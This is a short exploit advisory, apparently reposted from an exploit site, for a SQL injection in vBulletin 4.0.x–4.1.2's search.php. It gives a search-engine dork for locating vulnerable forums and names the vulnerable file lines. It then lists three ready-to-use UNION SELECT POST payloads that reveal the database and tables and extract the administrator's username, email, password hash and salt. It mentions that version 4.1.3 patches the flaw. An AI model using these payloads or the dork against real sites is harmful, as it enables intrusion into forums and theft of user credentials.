====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability# |
==================================================================== |
# 888 d8 888 _ 888 ,d d8 # |
# e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ # |
# d888 888 d888 888 888d8b 888 888b 888 888 # |
# 8888 888 / 888 888 888Y88b 888 8888 888 888 # |
# Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 # |
# "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ # |
==================================================================== |
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst# |
==================================================================== |
#[+] Discovered By : D4rkB1t |
#[+] support e-mail : d4rkb1t@live.com |
Product: http://www.vbulletin.com |
Dork : inurl:"search.php?search_type=1" |
-------------------------- |
-------------------------- |
/vb/search/searchtools.php - line 715; |
/packages/vbforum/search/type/socialgroup.php - line 201:203; |
-------------------------- |
-------------------------- |
POST data on "Search Multiple Content Types" => "groups" |
&cat[0]=1) UNION SELECT database()# |
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables# |
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# |
More info: http://j0hnx3r.org/?p=818 |
-------------------------- |
-------------------------- |
Vendor already released a patch on vb#4.1.3. |
==================================================================== |
# 1337day.com [2011-5-21] |
==================================================================== |
Posting Komentar